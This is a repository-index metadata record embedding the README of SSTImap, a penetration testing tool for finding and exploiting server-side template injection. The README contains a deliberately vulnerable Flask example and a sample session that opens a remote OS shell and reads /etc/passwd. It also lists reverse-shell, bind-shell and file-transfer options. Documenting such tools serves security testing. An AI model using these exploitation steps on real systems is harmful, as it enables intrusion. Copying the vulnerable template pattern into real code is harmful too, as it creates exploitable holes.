{"id":13633404,"url":"https://github.com/vladko312/SSTImap","last_synced_at":"2025-04-18T10:34:41.773Z","repository":{"id":51108156,"uuid":"503642648","full_name":"vladko312/SSTImap","owner":"vladko312","description":"Automatic SSTI detection tool with interactive interface","archived":false,"fork":false,"pushed_at":"2024-08-28T22:36:48.000Z","size":116,"stargazers_count":737,"open_issues_count":15,"forks_count":87,"subscribers_count":13,"default_branch":"master","last_synced_at":"2024-08-28T23:31:38.529Z","etag":null,"topics":["information-security","penetration-testing","penetration-testing-tools","pentest","pentest-tool","pentesting","pentesting-tools","python","rce","ssti"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/vladko312.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-06-15T06:27:32.000Z","updated_at":"2024-08-28T22:36:47.000Z","dependencies_parsed_at":"2024-01-06T23:25:23.918Z","dependency_job_id":"ee7f42a0-5646-49a1-b1ac-921ab9ea931e","html_url":"https://github.com/vladko312/SSTImap","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vladko312%2FSSTImap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vladko312%2FSSTImap/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vladko312%2FSSTImap/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositori
es/vladko312%2FSSTImap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vladko312","download_url":"https://codeload.github.com/vladko312/SSTImap/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":223779716,"owners_count":17201220,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["information-security","penetration-testing","penetration-testing-tools","pentest","pentest-tool","pentesting","pentesting-tools","python","rce","ssti"],"created_at":"2024-08-01T23:00:37.027Z","updated_at":"2024-11-09T02:32:00.477Z","avatar_url":"https://github.com/vladko312.png","language":"Python","readme":"SSTImap\n======\n\n[![Version 1.2](https://img.shields.io/badge/version-1.2-green.svg?logo=github)](https://github.com/vladko312/sstimap)\n[![Python 3.13](https://img.shields.io/badge/python-3.13-blue.svg?logo=python)](https://www.python.org/downloads/release/python-3130/)\n[![Python 3.6](https://img.shields.io/badge/python-3.6+-yellow.svg?logo=python)](https://www.python.org/downloads/release/python-360/)\n[![GitHub](https://img.shields.io/github/license/vladko312/sstimap?color=green\u0026logo=gnu)](https://www.gnu.org/licenses/gpl-3.0.txt)\n[![GitHub last commit](https://img.shields.io/github/last-commit/vladko312/sstimap?color=green\u0026logo=github)](https://github.com/vladko312/sstimap/commits/)\n[![Maintenance](https://img.shields.io/maintenance/yes/2024?logo=github)](https://github.com/vladko312/sstimap)\n\n\u003e This project is based on [Tplmap](https://github.com/epinna/tplmap/).\n\nSSTImap is a 
penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.\n\nThis tool was developed as an interactive penetration testing tool for SSTI detection and exploitation, which allows for more advanced exploitation. More payloads for SSTImap can be found [here](https://github.com/vladko312/extras).\n\nSandbox break-out techniques came from:\n- James Kettle's [Server-Side Template Injection: RCE For The Modern Web App][5]\n- Other public research [\\[1\\]][1] [\\[2\\]][2]\n- Contributions to Tplmap [\\[3\\]][3] [\\[4\\]][4].\n\nThis tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports _eval()_-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.\n\nDifferences with Tplmap\n-----------------------\n\nEven though this software is based on Tplmap's code, backwards compatibility is not provided.\n- Interactive mode (`-i`) allowing for easier exploitation and detection\n- Simple evaluation payloads as response markers in case of payload reflection\n- Added new payloads for generic templates, as well as a way to speed up detection using `--skip-generic`\n- Base language _eval()_-like shell (`-x`) or single command (`-X`) execution\n- Added a new payload for _Smarty_ without `{php}{/php}` enabled. The old payload is available as `Smarty_unsecure`.\n- Added a new payload for newer versions of _Twig_. 
The payload for the older version is available as `Twig_v1`.\n- User-Agent can be randomly selected from a list of desktop browser agents using `-A`\n- SSL verification can now be enabled using `--verify-ssl`\n- Short versions added to many arguments\n- Some old command line arguments were changed, check `-h` for help\n- Code was changed to use newer Python features\n- Burp Suite extension temporarily removed, as _Jython_ doesn't support Python 3\n\nServer-Side Template Injection\n------------------------------\n\nThis is an example of a simple website written in Python using the [Flask][6] framework and the [Jinja2][7] template engine. It integrates the user-supplied variable `name` in an unsafe way, as it is concatenated to the template string before rendering.\n\n```python3\nfrom flask import Flask, request, render_template_string\nimport os\n\napp = Flask(__name__)\n\n@app.route(\"/page\")\ndef page():\n    name = request.args.get('name', 'World')\n    # SSTI VULNERABILITY:\n    template = f\"Hello, {name}!\u003cbr\u003e\\n\" \\\n                \"OS type: {{os}}\"\n    return render_template_string(template, os=os.name)\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0', port=80)\n```\n\nNot only does this way of using templates create an XSS vulnerability, it also allows the attacker to inject template code that will be executed on the server, leading to SSTI.\n\n```\n$ curl -g 'https://www.target.com/page?name=John'\nHello John!\u003cbr\u003e\nOS type: posix\n$ curl -g 'https://www.target.com/page?name={{7*7}}'\nHello 49!\u003cbr\u003e\nOS type: posix\n```\n\nUser-supplied input should be introduced in a safe way through the rendering context:\n\n```python3\nfrom flask import Flask, request, render_template_string\nimport os\n\napp = Flask(__name__)\n\n@app.route(\"/page\")\ndef page():\n    name = request.args.get('name', 'World')\n    template = \"Hello, {{name}}!\u003cbr\u003e\\n\" \\\n               \"OS type: {{os}}\"\n    return render_template_string(template, 
name=name, os=os.name)\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0', port=80)\n```\n\nPredetermined mode\n------------------\n\nSSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different templates.\n\nAfter the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.\n\nTo check the URL, you can use `-u` argument:\n\n```\n$ ./sstimap.py -u https://example.com/page?name=John\n\n    ╔══════╦══════╦═══════╗ ▀█▀\n    ║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═\n    ║ ╚════╣ ╚════╗  ║ ║    ║{║ _ __ ___   __ _ _ __\n    ╚════╗ ╠════╗ ║  ║ ║    ║*║ | '_ ` _ \\ / _` | '_ \\\n    ╔════╝ ╠════╝ ║  ║ ║    ║}║ | | | | | | (_| | |_) |\n    ╚══════╩══════╝  ╚═╝    ╚╦╝ |_| |_| |_|\\__,_| .__/\n                             │                  | |\n                                                |_|\n[*] Version: 1.2.0\n[*] Author: @vladko312\n[*] Based on Tplmap\n[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal. 
\nIt is the end user's responsibility to obey all applicable local, state and federal laws.\nDevelopers assume no liability and are not responsible for any misuse or damage caused by this program\n\n\n[*] Testing if GET parameter 'name' is injectable   \n[*] Smarty plugin is testing rendering with tag '*'\n...\n[*] Jinja2 plugin is testing rendering with tag '{{*}}'\n[+] Jinja2 plugin has confirmed injection with tag '{{*}}'\n[+] SSTImap identified the following injection point:\n\n  GET parameter: name\n  Engine: Jinja2\n  Injection: {{*}}\n  Context: text\n  OS: posix-linux\n  Technique: render\n  Capabilities:\n\n    Shell command execution: ok\n    Bind and reverse shell: ok\n    File write: ok\n    File read: ok\n    Code evaluation: ok, python code\n\n[+] Rerun SSTImap providing one of the following options:\n    --os-shell                   Prompt for an interactive operating system shell\n    --os-cmd                     Execute an operating system command.\n    --eval-shell                 Prompt for an interactive shell on the template engine base language.\n    --eval-cmd                   Evaluate code in the template engine base language.\n    --tpl-shell                  Prompt for an interactive shell on the template engine.\n    --tpl-cmd                    Inject code in the template engine.\n    --bind-shell PORT            Connect to a shell bind to a target port\n    --reverse-shell HOST PORT    Send a shell back to the attacker's port\n    --upload LOCAL REMOTE        Upload files to the server\n    --download REMOTE LOCAL      Download remote files\n```\n\nUse `--os-shell` option to launch a pseudo-terminal on the target.\n\n```\n$ ./sstimap.py -u https://example.com/page?name=John --os-shell\n\n    ╔══════╦══════╦═══════╗ ▀█▀\n    ║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═\n    ║ ╚════╣ ╚════╗  ║ ║    ║{║ _ __ ___   __ _ _ __\n    ╚════╗ ╠════╗ ║  ║ ║    ║*║ | '_ ` _ \\ / _` | '_ \\\n    ╔════╝ ╠════╝ ║  ║ ║    ║}║ | | | | | | (_| | |_) |\n    
╚══════╩══════╝  ╚═╝    ╚╦╝ |_| |_| |_|\\__,_| .__/\n                             │                  | |\n                                                |_|\n[*] Version: 1.2.0\n[*] Author: @vladko312\n[*] Based on Tplmap\n[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal. \nIt is the end user's responsibility to obey all applicable local, state and federal laws.\nDevelopers assume no liability and are not responsible for any misuse or damage caused by this program\n\n\n[*] Testing if GET parameter 'name' is injectable\n[*] Smarty plugin is testing rendering with tag '*'\n...\n[*] Jinja2 plugin is testing rendering with tag '{{*}}'\n[+] Jinja2 plugin has confirmed injection with tag '{{*}}'\n[+] SSTImap identified the following injection point:\n\n  GET parameter: name\n  Engine: Jinja2\n  Injection: {{*}}\n  Context: text\n  OS: posix-linux\n  Technique: render\n  Capabilities:\n\n    Shell command execution: ok\n    Bind and reverse shell: ok\n    File write: ok\n    File read: ok\n    Code evaluation: ok, python code\n\n[+] Run commands on the operating system.\nposix-linux $ whoami\nroot\nposix-linux $ cat /etc/passwd\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n```\n\nTo get a full list of options, use `--help` argument.\n\nInteractive mode\n----------------\n\nIn interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use `-i` argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for settings.\n\nSome commands are used to alter settings between test runs. To run a test, target URL must be supplied via initial `-u` argument or `url` command. After that, you can use `run` command to check URL for SSTI.\n\nIf SSTI was found, commands can be used to start the exploitation. 
You get the same exploitation capabilities as in predetermined mode, but you can use `Ctrl+C` to abort them without stopping the program.\n\nTest results remain valid until the target URL is changed, so you can easily switch between exploitation methods without re-running the detection test every time.\n\nTo get a full list of interactive commands, use the `help` command in interactive mode.\n\nSupported template engines\n--------------------------\n\nSSTImap supports multiple template engines and _eval()_-like injections.\n\nNew payloads are welcome in PRs. Check out the [tips](https://github.com/vladko312/extras#developing-plugins) to speed up development.\n\n| Engine                               | RCE | Blind | Code evaluation | File read | File write |\n|--------------------------------------|-----|-------|-----------------|-----------|------------|\n| Mako                                 | ✓   | ✓     | Python          | ✓         | ✓          |\n| Cheetah                              | ✓   | ✓     | Python          | ✓         | ✓          |\n| Jinja2                               | ✓   | ✓     | Python          | ✓         | ✓          |\n| Tornado                              | ✓   | ✓     | Python          | ✓         | ✓          |\n| Python (code eval)                   | ✓   | ✓     | Python          | ✓         | ✓          |\n| Python-based generic templates       | ✓   | ✓     | Python          | ✓         | ✓          |\n| Nunjucks                             | ✓   | ✓     | JavaScript      | ✓         | ✓          |\n| Pug                                  | ✓   | ✓     | JavaScript      | ✓         | ✓          |\n| doT                                  | ✓   | ✓     | JavaScript      | ✓         | ✓          |\n| Marko                                | ✓   | ✓     | JavaScript      | ✓         | ✓          |\n| Dust (\u003c= dustjs-helpers@1.5.0)       | ✓   | ✓     | JavaScript      | ✓         | ✓          |\n| EJS                                
  | ✓   | ✓     | JavaScript      | ✓         | ✓          |\n| JavaScript (code eval)               | ✓   | ✓     | JavaScript      | ✓         | ✓          |\n| JavaScript-based generic templates   | ✓   | ✓     | JavaScript      | ✓         | ✓          |\n| Slim                                 | ✓   | ✓     | Ruby            | ✓         | ✓          |\n| ERB                                  | ✓   | ✓     | Ruby            | ✓         | ✓          |\n| Ruby (code eval)                     | ✓   | ✓     | Ruby            | ✓         | ✓          |\n| Smarty (unsecured)                   | ✓   | ✓     | PHP             | ✓         | ✓          |\n| Smarty (secured)                     | ✓   | ✓     | PHP             | ✓         | ✓          |\n| Twig (\u003c=1.19)                        | ✓   | ✓     | PHP             | ✓         | ✓          |\n| Twig (\u003e=2.12 \u003c2.14.11; \u003e=3.0 \u003c3.3.8) | ✓   | ✓     | PHP             | ✓         | ✓          |\n| PHP (code eval)                      | ✓   | ✓     | PHP             | ✓         | ✓          |\n| PHP-based generic templates          | ✓   | ✓     | PHP             | ✓         | ✓          |\n| Freemarker                           | ✓   | ✓     | Java            | ✓         | ✓          |\n| Velocity                             | ✓   | ✓     | Java            | ✓         | ✓          |\n| Twig (\u003e1.19 \u003c2.0)                    | ×   | ×     | ×               | ×         | ×          |\n| Dust (\u003e dustjs-helpers@1.5.0)        | ×   | ×     | ×               | ×         | ×          |\nMore plugins and payloads can be found in [SSTImap Extra Plugins](https://github.com/vladko312/extras) repository.\n\nBurp Suite Plugin\n-----------------\n\nCurrently, Burp Suite only works with Jython as a way to execute python2. 
Python3 functionality is not provided.\n\nFuture plans\n------------\n\nIf you plan to contribute something big from this list, inform me to avoid working on the same thing as me or other contributors.\n\n- [ ] Add more payloads for different engines\n- [ ] Parse raw HTTP request from file\n- [ ] Variable dumping functionality\n- [ ] Blind/side-channel value extraction\n- [ ] Better documentation (or at least any documentation)\n- [ ] Short arguments as interactive commands?\n- [ ] JSON/plaintext API modes for scripting integrations?\n- [ ] Better integration for Python scripts\n- [ ] Multipart POST data type support\n- [ ] Modules for more customisable requests (second order, reset, non-HTTP)\n- [ ] Payload processing scripts\n- [ ] Better config functionality\n- [ ] Saving found vulnerabilities\n- [ ] Reports in HTML or other format\n- [ ] Multiline language evaluation?\n- [ ] Avoid platform dependency in payloads\n- [ ] Update NodeJS payloads as process.mainModule may be undefined\n- [x] Spider/crawler automation (by [fantesykikachu](https://github.com/fantesykikachu))\n- [x] Automatic languages and engines import\n- [x] More POST data types support\n- [x] Make template and base language evaluation functionality more uniform\n- [x] Argument to remove escape codes?\n\n[1]: https://artsploit.blogspot.co.uk/2016/08/pprce2.html\n[2]: https://opsecx.com/index.php/2016/07/03/server-side-template-injection-in-tornado/\n[3]: https://github.com/epinna/tplmap/issues/9\n[4]: http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine\n[5]: http://blog.portswigger.net/2015/08/server-side-template-injection.html\n[6]: http://flask.pocoo.org/\n[7]: http://jinja.pocoo.org/\n","funding_links":[],"categories":["Weapons","Miscellaneous","红队\u0026渗透测试"],"sub_categories":["Tools","Vulnerability 
Scanners"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvladko312%2FSSTImap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvladko312%2FSSTImap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvladko312%2FSSTImap/lists"}